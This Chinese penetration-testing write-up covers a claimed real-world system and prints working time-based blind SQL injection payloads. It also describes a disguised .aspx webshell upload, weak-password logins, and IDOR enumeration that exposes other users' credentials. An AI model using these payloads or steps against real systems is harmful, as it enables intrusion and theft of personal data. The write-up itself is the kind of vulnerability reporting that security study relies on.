实战分享
2024-4-17 17:46:21 Author: mp.weixin.qq.com(查看原文) 阅读量:4 收藏

一次完整的
渗透测试

从刚开始学习网安就一直在学习sql注入,今天终于在靶场以外的系统挖到sql注入漏洞了,可喜可贺可喜可贺。

01
实战经过-sql注入漏洞

前台通过爆破的账号密码,进去

按顺序依次点击1、2、3,然后开启抓包点击4

抓下来数据包,到burp的重放模块

构造以下注入poc,可见注入延时了五秒,用户输入的语句成功拼接到原有的SQL语句上执行了

下面的poc是MenuIds的值

100%2C101%2C151%2C152%2C153%2C154%2C200%2C201%2C202%2C203%2C204%2C300%2C301%2C302%2C303%2C305%2C306%2C307%2C308%2C311%2C312%2C313%2C314%2C400%2C401%2C800%2C801%2C802%2C805%2C806%2C850%2C851%2C852%2C853%2C861%2C862%2C863%2C870%2C880%2C900%2C9070%2C9071%2C9080%2C9081%2C9082%2C9083%2C9084%2C9085%2C9086%2C9093'%3BWAITFOR%20DELAY%20'0%3A0%3A5'%20--
下面开始进行注入拿数据,构造下面poc,对数据库当前用户名进行查询
100%2C101%2C151%2C152%2C153%2C154%2C200%2C201%2C202%2C203%2C204%2C300%2C301%2C302%2C303%2C305%2C306%2C307%2C308%2C311%2C312%2C313%2C314%2C400%2C401%2C800%2C801%2C802%2C805%2C806%2C850%2C851%2C852%2C853%2C861%2C862%2C863%2C870%2C880%2C900%2C9070%2C9071%2C9080%2C9081%2C9082%2C9083%2C9084%2C9085%2C9086%2C9093'%3Bif(ascii(substring((select%20user)%2C1%2C1)))%3D116%20WAITFOR%20DELAY%20'0%3A0%3A5'%20--

成功延时5秒,说明数据库当前用户名第一个字母为t,下面继续对数据库用户名第N位字母进行猜解

然后拿到当前数据库名称,至此,sql注入漏洞验证完成

SQLMap进行自动化判断注入

02
实战经过-文件上传漏洞

请输入正文http://xxxxxxxx/Home/Index#

弱口令进去,账号和密码是123456

上传文件头为图片格式的图片马,然后将上传的文件名后缀改成aspx
根据返回的内容打开对应url,然后即可看到webshell上传成功
03
实战经过-越权漏洞-1
跟上一步一样先弱口令进去,并在新建处抓包
图示数据包的id参数,为0表中的数据为空
将其改成1,2一直推下去,即可查到数据
遍历id参数从1-40,即可查到当前系统的所有公交信息
04
实战经过-越权漏洞-2
编辑这个地方抓包
然后将id值改为1

可以看见明文看见其他用户的账户密码、手机号、邮箱等敏感信息,我们可以利用这个信息进行登录等操作

再次将数据包转发到burp的Intruder模块,进行1-100遍历id值,可见也是将全站用户信息都可以遍历出来了

如果你是一个长期主义者,欢迎加入我的知识星球,我们一起往前走,每日都会更新,精细化运营,微信识别二维码付费即可加入,如不满意,72 小时内可在 App 内无条件自助退款
前面有同学问我有没优惠券,这里发放100张100元的优惠券,用完今年不再发放

往期回顾

dom-xss精选文章

年度精选文章

Nuclei权威指南-如何躺赚

漏洞赏金猎人系列-如何测试设置功能IV

漏洞赏金猎人系列-如何测试注册功能以及相关Tips


文章来源: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247494300&idx=1&sn=4a89e4c91036cf6d9c81b138d0cb4a21&chksm=e8a5e0ffdfd269e9db30d4cd6d3c0106a9ea9038aabd931b12af58ba910720b7b0719c59677f&scene=58&subscene=0#rd
如有侵权请联系:admin#unsafe.sh